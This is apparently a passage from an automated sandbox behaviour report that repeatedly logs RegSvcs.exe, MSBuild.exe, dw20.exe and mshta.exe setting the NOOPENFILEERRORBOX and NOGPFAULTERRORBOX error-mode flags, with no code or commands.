              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
